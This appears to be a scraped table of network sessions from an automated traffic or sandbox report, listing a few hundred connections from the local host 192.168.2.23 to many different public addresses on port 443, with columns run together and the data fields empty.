                                                24348192.168.2.2334688126.160.163.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24349192.168.2.2345366219.3.192.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24350192.168.2.233369458.239.33.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24351192.168.2.234553250.211.154.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24352192.168.2.2352486159.109.44.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24353192.168.2.234376648.235.190.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24354192.168.2.2342784118.172.204.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24355192.168.2.2333400145.81.146.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24356192.168.2.2352784205.105.97.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24357192.168.2.236014861.126.104.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24358192.168.2.2333574148.201.88.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24359192.168.2.2346528110.22.217.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24360192.168.2.233710438.15.174.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24361192.168.2.2336034160.90.95.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24362192.168.2.235767093.154.148.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24363192.168.2.2342588108.172.132.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24364192.168.2.2358856197.236.122.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24365192.168.2.234791069.210.90.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24366192.168.2.2352264199.39.55.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24367192.168.2.2347322150.160.197.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24368192.168.2.235202487.198.100.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24369192.168.2.2346572202.210.71.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24370192.168.2.2349828126.87.140.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24371192.168.2.2344608145.211.252.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24372192.168.2.2355000177.166.61.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24373192.168.2.2350892179.199.213.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24374192.168.2.233839276.125.164.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24375192.168.2.2347814142.0.39.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24376192.168.2.2337332125.159.189.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24377192.168.2.2346642151.90.194.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24378192.168.2.235770674.143.149.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24379192.168.2.2339320203.160.152.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24380192.168.2.2356920200.74.61.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24381192.168.2.233519082.214.195.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24382192.168.2.2349332192.25.9.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24383192.168.2.233681873.128.47.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24384192.168.2.2349928177.213.249.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24385192.168.2.2360218210.60.176.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24386192.168.2.2357722113.188.122.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24387192.168.2.2345100144.9.137.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24388192.168.2.2334212159.72.244.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24389192.168.2.2345318159.181.204.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24390192.168.2.2346140114.200.224.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24391192.168.2.234693658.32.137.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24392192.168.2.2353304194.249.211.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24393192.168.2.2335540195.46.254.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24394192.168.2.2346102108.74.53.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24395192.168.2.235479640.13.124.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24396192.168.2.2337120120.247.83.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24397192.168.2.235005425.173.37.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24398192.168.2.2341836190.198.94.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24399192.168.2.2350192128.30.173.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24400192.168.2.2359634157.172.229.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24401192.168.2.2336648175.50.79.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24402192.168.2.236020082.95.222.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24403192.168.2.23608221.158.222.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24404192.168.2.2346760133.119.19.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24405192.168.2.235384290.92.77.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24406192.168.2.235013247.21.182.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24407192.168.2.233662423.36.184.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24408192.168.2.2339068126.72.235.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24409192.168.2.235563060.40.192.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24410192.168.2.233927623.44.92.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24411192.168.2.2352508126.100.211.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24412192.168.2.2351950162.154.103.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24413192.168.2.2350574175.41.2.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24414192.168.2.235722663.132.139.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24415192.168.2.234844863.35.238.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24416192.168.2.235525478.28.162.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24417192.168.2.2357078116.82.38.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24418192.168.2.235595265.193.20.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24419192.168.2.2340840107.129.7.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24420192.168.2.2349634145.229.177.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24421192.168.2.235437248.181.125.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24422192.168.2.2359414221.129.157.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24423192.168.2.234799813.189.172.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24424192.168.2.235224074.67.122.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24425192.168.2.234314669.119.229.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24426192.168.2.2342878222.240.90.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24427192.168.2.2333204218.217.107.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24428192.168.2.2352928131.206.103.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24429192.168.2.234814824.107.40.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24430192.168.2.2352958197.162.109.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24431192.168.2.2355162195.100.220.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24432192.168.2.234871086.156.43.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24433192.168.2.2345662221.175.98.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24434192.168.2.23463925.92.211.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24435192.168.2.2346602113.15.87.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24436192.168.2.234157497.53.215.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24437192.168.2.235749017.235.146.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24438192.168.2.2351892112.199.32.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24439192.168.2.234560444.114.71.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24440192.168.2.23381269.156.96.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24441192.168.2.2356258175.242.93.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24442192.168.2.236096848.63.58.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24443192.168.2.2354094130.222.62.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24444192.168.2.2340720148.120.145.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24445192.168.2.235947283.177.252.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24446192.168.2.2348802102.213.151.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24447192.168.2.2355794199.154.4.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24448192.168.2.2337384163.57.203.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24449192.168.2.2355134148.246.95.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24450192.168.2.233562077.207.126.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24451192.168.2.2347470197.160.229.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24452192.168.2.2359586105.68.161.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24453192.168.2.2332932164.26.250.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24454192.168.2.2349096139.185.68.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24455192.168.2.2332768168.147.209.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24456192.168.2.234733062.216.66.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24457192.168.2.233515234.169.222.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24458192.168.2.2334778108.161.79.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24459192.168.2.233828696.64.166.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24460192.168.2.235934074.195.118.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24461192.168.2.2335450136.173.43.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24462192.168.2.2339938188.103.170.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24463192.168.2.2354880146.95.87.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24464192.168.2.2359076129.189.133.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24465192.168.2.2346890135.61.129.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24466192.168.2.233493414.174.120.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24467192.168.2.2336278182.45.156.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24468192.168.2.2333048194.156.158.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24469192.168.2.234927080.84.139.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24470192.168.2.235474839.227.140.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24471192.168.2.235118427.140.251.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24472192.168.2.23371508.231.50.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24473192.168.2.2350720100.136.211.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24474192.168.2.234409481.174.34.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24475192.168.2.234811259.134.183.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24476192.168.2.2338274165.207.85.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24477192.168.2.2340368153.49.13.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24478192.168.2.23372108.231.50.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24479192.168.2.235604236.29.107.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24480192.168.2.234742462.216.66.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24481192.168.2.2354956216.106.183.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24482192.168.2.234921227.147.3.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24483192.168.2.236093061.126.104.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24484192.168.2.234277870.228.220.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24485192.168.2.234935480.84.139.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24486192.168.2.2347912117.125.138.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24487192.168.2.2341450148.120.145.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24488192.168.2.2334252187.201.241.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24489192.168.2.2337378176.56.188.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24490192.168.2.235675667.214.14.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24491192.168.2.2350406130.26.201.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24492192.168.2.2360288199.23.56.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24493192.168.2.233707423.116.215.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24494192.168.2.2355036205.230.143.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24495192.168.2.233387882.231.30.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24496192.168.2.233444490.68.99.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24497192.168.2.2354484129.136.30.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24498192.168.2.234318439.143.218.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24499192.168.2.2354958146.95.87.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24500192.168.2.235414441.224.144.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24501192.168.2.233685893.80.169.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24502192.168.2.23347528.65.242.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24503192.168.2.233913480.61.162.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24504192.168.2.2345820144.9.137.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24505192.168.2.2347916170.249.143.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24506192.168.2.235842867.184.34.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24507192.168.2.2352406107.255.82.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24508192.168.2.2337682206.228.57.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24509192.168.2.2337738135.161.188.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24510192.168.2.23456869.247.62.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24511192.168.2.234163631.198.39.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24512192.168.2.234691087.191.135.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24513192.168.2.2353038100.233.255.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24514192.168.2.2355198163.239.112.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24515192.168.2.2333392110.156.249.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24516192.168.2.2356520111.51.216.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24517192.168.2.2335318158.82.217.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24518192.168.2.234711682.170.178.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24519192.168.2.234537437.106.243.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24520192.168.2.2346280223.254.11.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24521192.168.2.2345676203.252.130.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24522192.168.2.234586296.142.136.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24523192.168.2.235251677.16.192.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24524192.168.2.233467459.39.214.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24525192.168.2.2350816157.174.116.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24526192.168.2.235763413.171.66.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24527192.168.2.234764059.216.160.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24528192.168.2.2353256111.199.164.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24529192.168.2.2338726208.0.12.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24530192.168.2.2344974151.137.93.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24531192.168.2.234136451.42.98.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24532192.168.2.234905618.245.234.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24533192.168.2.2336774123.64.187.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24534192.168.2.233604463.215.52.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24535192.168.2.233879674.133.183.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24536192.168.2.2360990102.64.131.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24537192.168.2.233617657.145.92.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24538192.168.2.2337072117.191.26.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24539192.168.2.2354924219.170.68.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24540192.168.2.235594084.240.53.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24541192.168.2.235378674.84.4.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24542192.168.2.233321652.42.170.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24543192.168.2.234988051.97.145.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24544192.168.2.2348382189.26.58.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24545192.168.2.2338674143.51.137.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24546192.168.2.2350932101.95.255.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24547192.168.2.234142268.245.243.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24548192.168.2.233455441.128.226.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24549192.168.2.2336992170.253.27.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24550192.168.2.2348288158.123.176.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24551192.168.2.2348828110.161.218.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24552192.168.2.2340936106.102.33.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24553192.168.2.2337026202.50.119.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24554192.168.2.2335338156.140.183.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24555192.168.2.2350008170.207.237.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24556192.168.2.2347962184.0.167.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24557192.168.2.234513034.50.143.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24558192.168.2.235087296.207.12.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24559192.168.2.2356152145.12.175.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24560192.168.2.2348700138.222.247.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24561192.168.2.235602280.209.59.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24562192.168.2.2337698137.32.147.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24563192.168.2.2341564202.147.19.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24564192.168.2.2339130206.229.108.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24565192.168.2.2354388135.157.72.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24566192.168.2.2344766160.232.204.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24567192.168.2.2335852191.117.49.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24568192.168.2.2339990192.145.162.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24569192.168.2.2338534183.129.133.186443
                                                TimestampBytes transferredDirectionData


